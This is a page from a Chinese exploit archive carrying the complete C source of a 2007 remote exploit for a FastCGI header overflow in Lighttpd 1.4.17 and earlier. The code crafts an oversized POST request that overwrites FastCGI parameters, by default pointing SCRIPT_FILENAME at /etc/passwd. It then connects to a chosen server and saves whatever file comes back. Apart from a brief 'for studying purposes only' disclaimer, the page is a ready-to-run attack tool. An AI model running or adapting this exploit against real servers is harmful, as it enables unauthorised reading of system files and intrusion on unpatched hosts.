首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Lighttpd <= 1.4.17 FastCGI Header Overflow Remote Exploit 来源：mattias@secweb.se 作者：Mattias 发布时间：2007-09-21   /*********************************************************** * hoagie_lighttpd.c * LIGHTTPD/FASTCGI REMOTE EXPLOIT (<= 1.4.17) * * Bug discovered by: * Mattias Bengtsson <mattias@secweb.se> * Philip Olausson <po@secweb.se> * http://www.secweb.se/en/advisories/lighttpd-fastcgi-remote-vulnerability/ * * FastCGI: * http://www.fastcgi.com/devkit/doc/fcgi-spec.html * * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF- * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY * DAMAGE DONE USING THIS PROGRAM. * * VOID.AT Security * andi@void.at * http://www.void.at * ************************************************************/ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> /* don't change this values except you know exactly what you are doing */ #define REQUEST_SIZE_BASE     0x1530a char FILL_CHAR[] = "void"; char RANDOM_CHAR[] = "01234567890"                      "abcdefghijklmnopqrstuvwxyz"                      "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; /* just default values */ #define DEFAULT_SCRIPT        "/index.php"   /* can be changed via -s */ #define DEFAULT_PORT          "80"           /* can be changed via -p */ #define DEFAULT_NAME          "SCRIPT_FILENAME" /* can be changed via -n */ #define DEFAULT_VALUE         "/etc/passwd"  /* can be change via -a */ #define DEFAULT_SEPARATOR     ',' #define BUFFER_SIZE           1024 /* header data type * defining header name/value content and length * if a fixed value is set use this one instead of generating content */ struct header_t {    int  name_length;    char name_char;    int  value_length;    char value_char;    char *value_value; }; /* generate_param * generate character array (input: comma separated list) */ char *generate_param(int *param_size_out,                      char **name,                      char **value) {    char *param = NULL;    int  param_size = 0;    int  param_offset = 0;    int  i;    int  name_length = 0;    int  value_length = 0;    for (i = 0; name[i] != NULL && value[i] != NULL; i++) {       name_length = strlen(name[i]);       value_length = strlen(value[i]);       if (name_length > 127) {          param_size += 4;       } else {          param_size++;       }       if (value_length > 127) {          param_size += 4;       } else {          param_size++;       }       param_size += strlen(name[i]) + strlen(value[i]);       param = realloc(param, param_size);       if (param) {          if (strlen(name[i]) > 127) {             param[param_offset++] = (name_length >> 24) | 0x80;             param[param_offset++] = (name_length >> 16) & 0xff;             param[param_offset++] = (name_length >> 8) & 0xff;             param[param_offset++] = name_length & 0xff;          } else {             param[param_offset++] = name_length;          }          if (strlen(value[i]) > 127) {             param[param_offset++] = (value_length >> 24) | 0x80;             param[param_offset++] = (value_length >> 16) & 0xff;             param[param_offset++] = (value_length >> 8) & 0xff;             param[param_offset++] = value_length & 0xff;          } else {             param[param_offset++] = value_length;          }          memcpy(param + param_offset, name[i], name_length);          param_offset += name_length;          memcpy(param + param_offset, value[i], value_length);          param_offset += value_length;       }    }    if (param) {       *param_size_out = param_size;    }    return param; } /* generate_buffer * generate header name or value buffer */ char *generate_buffer(int length, char c, int random_mode) {    char *buffer = (char*)malloc(length + 1);    int i;    if (buffer) {       memset(buffer, 0, length + 1);       if (random_mode) {          for (i = 0; i < length; i++) {             buffer[i] = RANDOM_CHAR[rand() % (strlen(RANDOM_CHAR))];          }       } else {          memset(buffer, c, length);       }    }    return buffer; } /* generate_array * generate character array (input: comma separated list) */ char **generate_array(char *list, char separator, int *length) {    char **data = NULL;    int i = 0;    int start = 0;    int j = 1;    if (list) {       for (i = 0; i <= strlen(list); i++) {          if (list[i] == separator ||              i == strlen(list)) {             data = realloc(data, (j + 1) * (sizeof(char*)));             if (data) {                data[j - 1] = malloc(i - start + 1);                if (data[j - 1]) {                   strncpy(data[j - 1], list + start, i - start);                   data[j - 1][i - start + 1] = 0;                }                data[j] = NULL;             }             start = i + 1;             j++;          }       }       *length = j;    }    return data; } /* generate_request * generate http request to trigger the overflow in fastcgi module * and overwrite fcgi param data with post content */ char *generate_request(char *server, char *port,                        char *script, char **names,                        char **values, int *length_out,                        int random_mode) {    char *param;    int  param_size;    char *request;    int  offset;    int  length;    int  i;    int  fillup;    char *name;    char *value;    /* array of header data that is used to create header name and value lines     * most of this values can be changed -> only length is important and a     * few characters */    struct header_t header[] = {       { 0x01, '0', 0x04, FILL_CHAR[0], NULL },       { FILL_CHAR[0] - 0x5 - 0x2, 'B', FILL_CHAR[0] - 0x2, 'B', NULL },       { 0x01, '1', 0x5450 - ( (FILL_CHAR[0] + 0x1) *  2) - 0x1 - 0x5 - 0x1 - 0x4, 'C', NULL },       { 0x01, '2', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'D',  NULL },       { 0x01, '3', 0x04, FILL_CHAR[1], NULL },       { FILL_CHAR[1] - 0x5 - 0x2, 'F', FILL_CHAR[1] - 0x2, 'F', NULL },       { 0x01, '4', 0x5450 - ( (FILL_CHAR[1] + 0x1) *  2) - 0x1 - 0x5 - 0x1 - 0x4, 'H', NULL },       { 0x01, '5', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'I',  NULL },       { 0x01, '6', 0x04, FILL_CHAR[2], NULL },       { FILL_CHAR[2] - 0x5 - 0x2, 'K', FILL_CHAR[2] - 0x2, 'K',  NULL },       { 0x01, '7', 0x5450 - ( (FILL_CHAR[2] +  0x1) *  2) - 0x1 - 0x5 - 0x1 - 0x4, 'L', NULL },       { 0x01, '8', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'M', NULL },       { 0x01, '9', 0, 0, "uvzz" },       { FILL_CHAR[3] - 0x5 - 0x2, 'O', FILL_CHAR[3] - 0x2, 'O',  NULL },       { 0x01, 'z', 0x1cf - ((FILL_CHAR[3]- 0x1 ) * 2) -0x1 - 0x5 - 0x1 - 0x4, 'z',  NULL },       { 0x00, 0x00, 0x00, 0x00, NULL }    };    /* fill rest of post content with data */    char content_part_one[] = {       0x06, 0x80, 0x00, 0x00, 0x00, 'H', 'T', 'T', 'P', '_', 'W'    };    /* set a fake FastCGI record to mark the end of data */    char content_part_two[] = {       0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,       0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00    };    param = generate_param(&param_size, names, values);    if (param && param_size > 0) {       fillup = 0x54af - 0x5f - 0x1e3 - param_size - 0x1 - 0x5 - 0x1 - 0x4;       length = REQUEST_SIZE_BASE + param_size +                strlen(server) + strlen(port) +                strlen(script);       request = (char*)malloc(length);       if (request) {          memset(request, 0, length);          offset = sprintf(request,                           "POST %s HTTP/1.1\r\n"                           "Host: %s:%s\r\n"                           "Connection: close\r\n"                           "Content-Length: %d\r\n"                           "Content-Type: application/x-www-form-urlencoded\r\n",                           script,                           server, port,                           fillup + param_size + sizeof(content_part_one) +                           sizeof(content_part_two) + 0x5f);          for (i = 0; header[i].name_length != 0; i++) {             name = generate_buffer(header[i].name_length,                                    header[i].name_char,                                    header[i].name_length != 1 ? random_mode : 0);             if (header[i].value_value) {                value = header[i].value_value;             } else {                value = generate_buffer(header[i].value_length,                                        header[i].value_char,                                        header[i].value_length != 4 &&                                        header[i].value_char != 'z' ? random_mode : 0);             }             offset += sprintf(request + offset,                               "%s: %s\r\n", name, value);             if (!header[i].value_value) {                free(value);             }             free(name);          }          offset += sprintf(request + offset, "\r\n");          memcpy(request + offset, param, param_size);          offset += param_size;          content_part_one[0x03] = (fillup >> 8) & 0xff;          content_part_one[0x04] = fillup & 0xff;          for (i = 0; i < sizeof(content_part_one); i++) {             request[offset++] = content_part_one[i];          }          for (i = 0; i < fillup + 0x5f; i++) {             request[offset++] = random_mode ? RANDOM_CHAR[rand() % (strlen(RANDOM_CHAR))] : 'W';          }          for (i = 0; i < sizeof(content_part_two); i++) {             request[offset++] = content_part_two[i];          }          *length_out = offset;       }    }    return request; } /* usage * display help screen */ void usage(int argc, char **argv) {    fprintf(stderr,            "usage: %s [-h] [-v] [-r] [-d <host>] [-s <script>] [-p <port>]\n"            "       [-n <header names>] [-a <header values>] [-o <output>]\n"            "\n"            "-h        help\n"            "-v        verbose\n"            "-r        enable random mode\n"            "-d host   HTTP server\n"            "-p port   HTTP port (default: %s)\n"            "-s script script url on remote server (default: %s)\n"            "-n value  header names (comma seperated, default: %s)\n"            "-a value  header values (comma seperated, default: %s)\n"            "-o output save result in output file\n"            "\n"            ,            argv[0],            DEFAULT_PORT,            DEFAULT_SCRIPT,            DEFAULT_NAME,            DEFAULT_VALUE);    exit(1);           } /* connect_to * connect to remote http server */ int connect_to(char *host, int port) {    struct sockaddr_in s_in;    struct hostent *he;    int s;    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {       return -1;    }    memset(&s_in, 0, sizeof(s_in));    s_in.sin_family = AF_INET;    s_in.sin_port = htons(port);    if ( (he = gethostbyname(host)) != NULL)        memcpy(&s_in.sin_addr, he->h_addr, he->h_length);    else {        if ( (s_in.sin_addr.s_addr = inet_addr(host) ) < 0) {           return -3;        }    }     if (connect(s, (struct sockaddr *)&s_in, sizeof(s_in)) == -1) {       return -4;    }    return s; } /* parse_response * parse response data from http server */ void parse_response(char *response, int response_length, char *output) {    char *p;    int http_code;    int header_mode = 1;    int size;    int bytes = 0;    FILE *fp = stdout;    p = strtok(response, "\r\n");    while (p) {       /* header mode active? */       if (header_mode) {          if (strstr(p, "HTTP/1.1 ") == p) {             sscanf(p, "HTTP/1.1 %d", &http_code);             if (http_code == 200) {                printf("[*] request successful\n");             } else {                printf("[*] request failed (error code: %d)\n", http_code);             }          } else if (strstr(p, "Server: ") == p) {             printf("[*] server version: %s\n", strstr(p, "Server: ") + 8);          /* content length for first content */          } else if (!strchr(p, ':') && http_code == 200) {             sscanf(p, "%x", &size);             header_mode = 0;             if (output) {                fp = fopen(output, "w");             }          }       } else {          if (bytes < size) {             fprintf(fp, "%s\n", p);             bytes += strlen(p) + 1;          }       }       p = strtok(NULL, "\r\n");    }    if (fp != stdout && fp != NULL) {       printf("[*] %d bytes written to %s\n", bytes, output);       fclose(fp);    } } /* main entry */ int main(int argc, char **argv) {    char *server = NULL;    char *port = DEFAULT_PORT;    char *script = DEFAULT_SCRIPT;    char **name = NULL;    int name_length = 0;    char **value = NULL;    int value_length = 0;    char *request = NULL;    int request_length = 0;    int i;    int random_mode = 0;    int verbose = 0;    int s;    char c;    fd_set fs;    int bytes;    char buffer[BUFFER_SIZE];    char *response = NULL;    int response_length = 0;    char *output = NULL;    fprintf(stderr,            "hoagie_lighttpd.c - lighttpd(fastcgi) <= 1.4.17 remote\n"            "-andi / void.at\n\n");    if (argc < 2) {       usage(argc, argv);    } else {       while ((c = getopt (argc, argv, "hvrd:p:s:u:n:a:o:")) != EOF) {          switch (c) {             case 'h':                  usage(argc, argv);                  break;             case 'd':                  server = optarg;                  break;             case 'p':                  port = optarg;                  break;             case 's':                  script = optarg;                  break;             case 'n':                  name = generate_array(optarg, DEFAULT_SEPARATOR, &name_length);                  break;             case 'a':                  value = generate_array(optarg, DEFAULT_SEPARATOR, &value_length);                  break;             case 'r':                  random_mode = 1;                  srand(time(NULL));                  break;             case 'v':                  verbose = 1;                  break;             case 'o':                  output = optarg;                  break;             default:                  fprintf(stderr, "[*] unknown command line option '%c'\n", c);                  exit(-1);          }       }       if (!name) {          name = generate_array(DEFAULT_NAME, DEFAULT_SEPARATOR, &name_length);       }       if (!value) {          value = generate_array(DEFAULT_VALUE, DEFAULT_SEPARATOR, &value_length);       }       if (name_length != value_length) {          fprintf(stderr,                  "[*] check -n and -n parameter (argument list doesnt match)\n");       } else if (!server) {          fprintf(stderr, "[*] server is missing\n");       } else {          if (random_mode) {             for (i = 0; i < 4; i++) {                FILL_CHAR[i] = RANDOM_CHAR[rand() % (strlen(RANDOM_CHAR))];             }          }          printf("[*] creating request (filler: %c/%c/%c/%c, random: %s)\n",                 FILL_CHAR[0], FILL_CHAR[1], FILL_CHAR[2], FILL_CHAR[3],                 random_mode ? "on": "off");          for (i = 0; name[i]; i++) {             printf("[*] set header [%s]=>[%s]\n", name[i], value[i]);          }          request = generate_request(server, port, script, name, value,                                     &request_length, random_mode);          if (verbose) {             printf("[*] sending [");             write(1, request, request_length);             printf("]\n");          }          if (request) {             printf("[*] connecting to %s:%s ...\n", server, port);             s = connect_to(server, atoi(port));             if (s > 0) {                FD_ZERO(&fs);                FD_SET(s, &fs);                printf("[*] request url %s\n", script);                write(s, request, request_length);                do {                   select(s + 1, &fs, NULL, NULL, NULL);                   bytes = read(s, buffer, sizeof(buffer));                   if (bytes > 0) {                      response_length += bytes;                      response = realloc(response, response_length + 1);                      if (response) {                         memcpy(response + response_length - bytes,                                buffer,                                bytes);                      }                   }                } while (bytes > 0);                close(s);                response[response_length] = 0;                parse_response(response, response_length, output);             } else {                fprintf(stderr, "[*] connect failed\n");             }             free(request);          } else {             fprintf(stderr, "[*] can't allocate memory for request\n");          }       }       for (i = 0; name[i]; i++) {          free(name[i]);       }       free(name);       for (i = 0; value[i]; i++) {          free(value[i]);       }       free(value);    }    return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·IMail iaspam.dll 8.0x Remote H ·EasyMail MessagePrinter Object ·Flip <= 3.0 Remote Password Ha ·Xitami Web Server 2.5 (If-Modi ·Flip <= 3.0 Remoe Admin Creati ·AskJeeves Toolbar 4.0.2.53 act ·OneCMS 2.4 (userreviews.php ab ·EB Design Pty Ltd (EBCRYPT.DLL ·Sun jre1.6.0_X isInstalled.dns ·Motorola Timbuktu Pro 8.6.3 Ar ·Microsoft Visual Basic Enterpr ·>Mercury/32 4.52 IMAPD SEARCH   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved